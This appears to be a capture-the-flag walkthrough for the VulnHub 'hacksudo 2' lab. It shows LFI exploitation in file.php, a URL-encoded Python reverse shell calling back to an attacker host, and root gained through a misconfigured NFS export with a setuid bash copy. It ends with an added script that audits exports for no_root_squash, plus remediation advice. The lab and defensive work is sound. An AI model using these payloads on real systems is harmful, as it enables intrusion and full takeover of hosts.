https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/
Scan ports.
Scan port 80.
Info.php is a phpinfo page; file.php has an LFI vulnerability.
Use the exploit script below to get a command shell.
https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py
Check if the shell is OK.
Then visit http://192.168.56.93/file.php?file=/tmp/f&1=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27 to get an interactive reverse shell.
There is another way to get a user shell (sometimes exp.py did not work).
First mount the NFS share, then copy reverse.php to /mnt/nfs, and load it through file.php?file=/mnt/nfs/reverse.php.
Since NFS is available and misconfigured, we can get root through NFS.
On the attacker's machine, run the following commands:
showmount -e 192.168.56.93
sudo mount -t nfs 192.168.56.93:/mnt/nfs /mnt
cd /mnt
sudo cp /bin/bash ./
sudo chmod +s ./bash
Then, from the reverse shell, we can get root.
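From the defender's side, the export setting behind this can be checked on the NFS server. The script below is an added example, not part of the original writeup: it assumes the misconfiguration is the no_root_squash export option (the writeup does not show the exports file), and audit_exports is a hypothetical helper name.

```shell
#!/bin/sh
# Added example: flag NFS exports that let a remote root user create
# root-owned (and therefore setuid-root) files on the server.
# Assumption: standard /etc/exports syntax "path client(opt,opt) ...".

audit_exports() {
    # $1 = path to an exports file (defaults to /etc/exports)
    awk '
    /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
    {
        sub(/[ \t]*#.*$/, "")                # strip a trailing comment
        path = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            }
            if (client == "") client = "*"   # "(opts)" with no host means any host
            o = "," opts ","
            if (index(o, ",no_root_squash,"))
                printf "HIGH %s %s: no_root_squash (client root acts as server root)\n", path, client
            if (index(o, ",rw,") && client == "*")
                printf "MEDIUM %s %s: writable by any host\n", path, client
        }
    }' "${1:-/etc/exports}"
}

# Constructed sample exports file, not taken from the target VM.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample
/mnt/nfs    *(rw,sync,no_root_squash)
/srv/share  10.0.0.0/24(rw,sync,root_squash)
/srv/pub    *(ro,all_squash)
EOF
audit_exports "$sample"
rm -f "$sample"
```

root_squash is the default, so the fix is to remove no_root_squash, restrict the client list, and re-export with exportfs -ra.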